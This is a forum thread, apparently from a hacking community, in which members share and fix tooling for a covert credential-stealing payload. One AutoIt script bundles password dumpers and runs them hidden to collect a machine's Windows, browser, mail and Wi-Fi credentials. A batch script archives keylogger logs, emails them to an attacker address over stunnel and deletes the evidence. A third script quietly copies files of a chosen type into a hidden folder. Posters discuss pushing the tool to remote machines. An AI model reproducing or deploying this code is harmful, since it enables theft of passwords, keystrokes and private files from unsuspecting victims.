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i rewrote the fetching part so it is only one executable :

here the code

#include <Constants.au3>

FileInstall("pwdump.exe", @ScriptDir & "\pwdump.exe")
FileInstall("pwdump7.exe", @ScriptDir & "\pwdump7.exe")
FileInstall("fgdump.exe", @ScriptDir & "\fgdump.exe")
FileInstall("netpass.exe", @ScriptDir & "\netpass.exe")
FileInstall("firepassword.exe", @ScriptDir & "\firepassword.exe")
FileInstall("mailpv.exe", @ScriptDir & "\mailpv.exe")
FileInstall("ChromePass.exe", @ScriptDir & "\ChromePass.exe")
FileInstall("mspass.exe", @ScriptDir & "\mspass.exe")
FileInstall("pspv.exe", @ScriptDir & "\pspv.exe")
FileInstall("produkey.exe", @ScriptDir & "\produkey.exe")
FileInstall("wul.exe", @ScriptDir & "\wul.exe")
FileInstall("portqry.exe", @ScriptDir & "\portqry.exe")
FileInstall("wifike.exe", @ScriptDir & "\wifike.exe")
FileInstall("servpw.exe", @ScriptDir & "\servpw.exe")
FileInstall("libeay32.dll", @ScriptDir & "\libeay32.dll")

ConsoleWrite(GetOutputOf('fgdump.exe -vv -c'))
ConsoleWrite(GetOutputOf('netpass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('mailpv.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('ChromePass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('mspass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('pspv.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('produkey.exe /nosavereg /stext tmpfile'))
ConsoleWrite(GetOutputOf('vul.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('portqry.exe -local -v -v'))
ConsoleWrite(GetOutputOf('wifike.exe /stext tmpfile'))

$search = FileFindFirstFile(@ScriptDir & "\*.*")  
While 1
    $file = FileFindNextFile($search) 
    If @error Then ExitLoop
    if $file = "start.exe" then ContinueLoop
    if $file = "start.au3" then ContinueLoop
    if $file = "output.txt" then ContinueLoop

Func GetOutputOf($cmd)
    Local $foo = Run(@ScriptDir & '\' & $cmd, @ScriptDir, @SW_HIDE, $STDERR_CHILD + $STDOUT_CHILD)
    Local $line, $output, $headder = '##############################################' & @CRLF & $cmd & @CRLF & '##############################################' & @CRLF
    While 1
        $line = StdoutRead($foo)
        If @error Then ExitLoop
        $output &= $line
    If StringInStr($cmd, "tmpfile") Then
        $output = FileRead(@ScriptDir & '\tmpfile')
        FileDelete(@ScriptDir & '\tmpfile')
    Return $headder & $output
EndFunc  ;==>GetOutputOf

attached you find the link to the exe, because all executables that fetch information are included into the exe it is 1.936.652 kb in size, unfortunately the forum lets me upload only 500kb ...

if you execute the file it will extract the executables bound to the attached exe, then start them with the paramaters you see in the source code.

the output of interin text files will be piped into the dos console, so a simple call of start.exe >> output.txt will be enough to get all information of the device :-)


best regards,


btw: if you need "special development" of custom software feel free to contact me.

here the link: start.exe

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i rewrote the fetching part so it is only one executable :

here the code

#include <Constants.au3>

FileInstall("pwdump.exe", @ScriptDir & "\pwdump.exe")
FileInstall("pwdump7.exe", @ScriptDir & "\pwdump7.exe")
FileInstall("fgdump.exe", @ScriptDir & "\fgdump.exe")
FileInstall("netpass.exe", @ScriptDir & "\netpass.exe")
FileInstall("firepassword.exe", @ScriptDir & "\firepassword.exe")
FileInstall("mailpv.exe", @ScriptDir & "\mailpv.exe")
FileInstall("ChromePass.exe", @ScriptDir & "\ChromePass.exe")
FileInstall("mspass.exe", @ScriptDir & "\mspass.exe")
FileInstall("pspv.exe", @ScriptDir & "\pspv.exe")
FileInstall("produkey.exe", @ScriptDir & "\produkey.exe")
FileInstall("wul.exe", @ScriptDir & "\wul.exe")
FileInstall("portqry.exe", @ScriptDir & "\portqry.exe")
FileInstall("wifike.exe", @ScriptDir & "\wifike.exe")
FileInstall("servpw.exe", @ScriptDir & "\servpw.exe")
FileInstall("libeay32.dll", @ScriptDir & "\libeay32.dll")

ConsoleWrite(GetOutputOf('fgdump.exe -vv -c'))
ConsoleWrite(GetOutputOf('netpass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('mailpv.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('ChromePass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('mspass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('pspv.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('produkey.exe /nosavereg /stext tmpfile'))
ConsoleWrite(GetOutputOf('vul.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('portqry.exe -local -v -v'))
ConsoleWrite(GetOutputOf('wifike.exe /stext tmpfile'))

$search = FileFindFirstFile(@ScriptDir & "\*.*")  
While 1
    $file = FileFindNextFile($search) 
    If @error Then ExitLoop
    if $file = "start.exe" then ContinueLoop
    if $file = "start.au3" then ContinueLoop
    if $file = "output.txt" then ContinueLoop

Func GetOutputOf($cmd)
    Local $foo = Run(@ScriptDir & '\' & $cmd, @ScriptDir, @SW_HIDE, $STDERR_CHILD + $STDOUT_CHILD)
    Local $line, $output, $headder = '##############################################' & @CRLF & $cmd & @CRLF & '##############################################' & @CRLF
    While 1
        $line = StdoutRead($foo)
        If @error Then ExitLoop
        $output &= $line
    If StringInStr($cmd, "tmpfile") Then
        $output = FileRead(@ScriptDir & '\tmpfile')
        FileDelete(@ScriptDir & '\tmpfile')
    Return $headder & $output
EndFunc ;==>GetOutputOf

attached you find the link to the exe, because all executables that fetch information are included into the exe it is 1.936.652 kb in size, unfortunately the forum lets me upload only 500kb ...

if you execute the file it will extract the executables bound to the attached exe, then start them with the paramaters you see in the source code.

the output of interin text files will be piped into the dos console, so a simple call of start.exe >> output.txt will be enough to get all information of the device :-)


best regards,


btw: if you need "special development" of custom software feel free to contact me.

here the link: start.exe

Did you see my topic of the version i wrote in autoit? I was considering doing it with fileinstall but hadnt gotten that far yet i wanted to get the rest of it working good. This was my next task cause i wanted to be able to push it via networking and then execute it on a remote computer... good work!!!

here is a link to my topic with my code...


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will it search the entire computer?

It will recursively copy the contents of the directory in which it is run. If you run it from C:\ it will copy from all of C:\, if you run it from D:\ it would copy from all of D:\, and so on and so forth.

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It will recursively copy the contents of the directory in which it is run. If you run it from C:\ it will copy from all of C:\, if you run it from D:\ it would copy from all of D:\, and so on and so forth.

i just dont see how thats useful... what you need is a single script that searches the entire computer like linux

find / |grep *.doc

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You can do that with the dir command, you'd just need to have it move to the root directory first.

yeah but can you write a shell script of some sort that recursivly copies ALL files with a specific extension to one directory. And if you can then post the code. In any language... preferably either bat or autoIT or python. My guess is that python would be the fastest though.

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i just dont see how thats useful... what you need is a single script that searches the entire computer like linux

Hm. I should get to work on that. I wonder if File.exist?("D:\.") would work to see if a drive existed. Unfortunately I don't really want to reboot right now, so I guess we will never know. And also, I'm fairly sure that a Ruby version will be just as good as a Python version; they are practically the same language anyway.

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Hm. I should get to work on that. I wonder if File.exist?("D:\.") would work to see if a drive existed. Unfortunately I don't really want to reboot right now, so I guess we will never know. And also, I'm fairly sure that a Ruby version will be just as good as a Python version; they are practically the same language anyway.

i like ruby tooo.... im looking for source code too... that way it can be expanded on as well.

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Re wrote my crappy post

Okay now ive officially read all 34 pages.. rawr!! i am king. lol anyway.

Couple of things, love your work leapo. (can't spell and im too tired) great idea. I also think i know the problems in the sending of information over the Gmail accounts. ill post new send. files. Also in the start.bat script it also doesn't actually call the right file anyway....

I think this is due to you change the files because you have not actually finished writing that part of the code. Or i could be wrong. in the start.bat. Anyway i do know what im talkin about in the sending part.


In Send.bat

GOTO setvariables

:: Dump logs
pssuspend winlogon.exe
pssuspend -r winlogon.exe

:: Selects where to grab logs from
if exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO AdminRights
if not exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO TryAlternate
if exist %appdata%\klgr\winlogon.exe GOTO Recover
if not exist %appdata%\klgr\winlogon.exe GOTO NoRights

::If admin rights are found, email logs this way
:: Archive log in 1MB chunks
rar a %computername%keylog.rar %systemroot%\keylog.txt -v1024k -vn
stunnel-4.11.exe -install -quiet
net start stunnel
for %%i in (%systemroot%\%computername%keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server
GOTO cleanup

::If adminrights are not found, email logs this way
:: Archive log in 1MB chunks
rar a keylog.rar %appdata%\keylog.txt -v1024k -vn
stunnel-4.11.exe -install -quiet
net start stunnel
for %%i in (%appdata%\keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server
GOTO cleanup

:: Stop stunnel
rem taskkill /f /im stunnel-4.11.exe (??)
net stop stunnel
stunnel-4.11.exe -uninstall -quiet

:: Delete documents
rmdir /s /q docs
::Not sure what ^^ line does cause there should not be a docs folder due to the no hacksaw...

:: Delete archive
::For Admin Rights
del /q /f %systemroot%\%computername%keylog.r*.*
::For No Admin Rights
del /q /f %appdata%\keylog.r*.* 
GOTO end


This is only minor clean up code and the bold computer name part. You weren't actually sending anything...

That should "theoretically" fix the sending of the Keylogs.

The Hacksaw sending is Fine

But i dont have an awesome deal of knowledge of cmd to understand the NMAP one.



GOTO Setvariables

so i gather that :sendfiles means that it is defining that when you say later to go to This point. which is wrong.. cause you already define it later on:

for %%i in (%computername%.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server
GOTO cleanup

So defining it twice i believe would make windows chuck a hissy :D (I think.. correct me if im wrong)

So unless i am wrong (which i prob will be) by getting rid of the first ":sendfiles" it SHould fix it. as well as:

send_partial for nmap


:: Stop stunnel
rem taskkill /f /im stunnel-4.11.exe (??)
net stop stunnel
stunnel-4.11.exe -uninstall -quiet

:: Delete documents
:: Delete archive
rmdir /s /q %systemroot%\$NtUninstallKB91338$
GOTO end

you were actually deleting the wrong folder and not the archives. oo now i get it. But yes. you forgot the 8. Just small fixes :D

Also add under ::Delete documents "del /q /f %computername%.*

Now the Nmap SHOULD send, as well as the keylogger as long as it makes the logs correctly and in C:\ or wherev its mean to be.

Hope these actually work. Im in the process of installing xp. (stupid shit os.....takes to long) on a virtual machine. So yeah. then i was going to try it :D

Just thinking now as i was reading over it...that it does a 3 part send and 3 part clean up... fk it im still posting. :P

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somebody requested a slurping code in autoit?


Func _CopyAll($type, $where = @HomeDrive, $to = "C:\HIDDEN\FOLDER\")
    Local $search = FileFindFirstFile($where & "\*.*"), $file
    If $search = -1 Then
        Return False
    While 1
        $file = FileFindNextFile($search)
        If @error Then ExitLoop
        If StringRight($file, 4) = "." & $type Then FileCopy($where & "\" & $file, $to, 9)
        If StringInStr(FileGetAttrib($where & "\" & $file), "D") Then
            Call("_CopyAll", $type, $where & "\" & $file)
EndFunc ;==>_CopyAll

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somebody requested a slurping code in autoit?


Func _CopyAll($type, $where = @HomeDrive, $to = "C:\HIDDEN\FOLDER\")
    Local $search = FileFindFirstFile($where & "\*.*"), $file
    If $search = -1 Then
        Return False
    While 1
        $file = FileFindNextFile($search)
        If @error Then ExitLoop
        If StringRight($file, 4) = "." & $type Then FileCopy($where & "\" & $file, $to, 9)
        If StringInStr(FileGetAttrib($where & "\" & $file), "D") Then
            Call("_SearchAll", $type, $where & "\" & $file)
EndFunc ;==>_CopyAll

Sweet ill have to try this out.

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this project is freezing someones gotta release VER 9 gerr

In fact, I'm waiting for version 9 for something else developing, but without Leapo... we can continue developing this stuff. The first we have to do is reading the forum, there are very interesting things we can add to the payload as the MySQL+PHP way of sending the logs (not only this). Moreover, some of us can contribute with new ideas but a working group is needed and a base in what to develop is needed too.

Where's Leapo? :lol:

If he wants to continue his work as he told a pair of weeks ago, I'll be glad of contributing in the few I could, if he doesn't... will wait!

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